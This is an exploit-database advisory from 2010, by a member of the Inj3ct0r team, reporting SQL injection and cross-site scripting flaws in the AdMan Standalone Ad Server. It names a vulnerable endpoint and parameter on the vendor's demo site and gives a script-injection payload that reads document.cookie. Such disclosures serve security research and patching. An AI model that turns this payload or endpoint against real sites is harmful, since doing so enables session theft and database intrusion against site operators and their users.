AdMan Standalone Ad Server XSS / SQL Injection Vulnerability

2010-06-18T00:00:00
ID 1337DAY-ID-12769
Type zdt
Reporter Sid3^effects
Modified 2010-06-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ============================================================
AdMan Standalone Ad Server XSS / SQL Injection Vulnerability
============================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name : AdMan Standalone Ad Server SQLi AND XSS Vulnerability
Date : june, 18 2010
Vendor url :http://www.formfields.com/adManArea/adManDemo.php
Critical Level     : HIGH
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
greetz to :All ICW members and my friends luv y0 guyz
#######################################################################################################
DESCRIPTION:
AdMan is a standalone Ad Server that provides publishers with a way to organize ads, view real-time traffic statistics, handle online

transactions and interact with advertisers. AdMan is the perfect tool for companies wishing to eliminate commission charges from advertising

middlemen and provide more customizable ad products to their advertisers. AdMan is compatible with many other ad management services like

Google AdSense, AdBrite, and Commission Junction. This way you can centralize your ad reporting and even provide more customizable ad

products to premiere advertisers. Moreover, AdMan utilizes iframes and can therefore be plugged into any existing website architecture.

Features: Manage your ads, sell your ads, manage advertisers, provide real time reporting, integrate with 3rd party suppliers, accept credit

card payments and much more!

#######################################################################################################
Xploit: SQLI Vulnerability

DEMO URL : http://www.formfields.com/adManArea/adMan1/adMan/advertiser/listActiveAdSpacesForCampaign.php?campaignId=[SQLI]

###############################################################################################################
Xploit: XSS Vulnerability

Attack Pattern: "><script>alert(document.cookie)</script>

DEMO URL :http://www.formfields.com/adManArea/adMan1/adMan/advertiser/listActiveAdSpacesForCampaign.php?campaignId=[XSS]
###############################################################################################################
# 0day no more
# Sid3^effects 



#  0day.today [2018-04-11]  #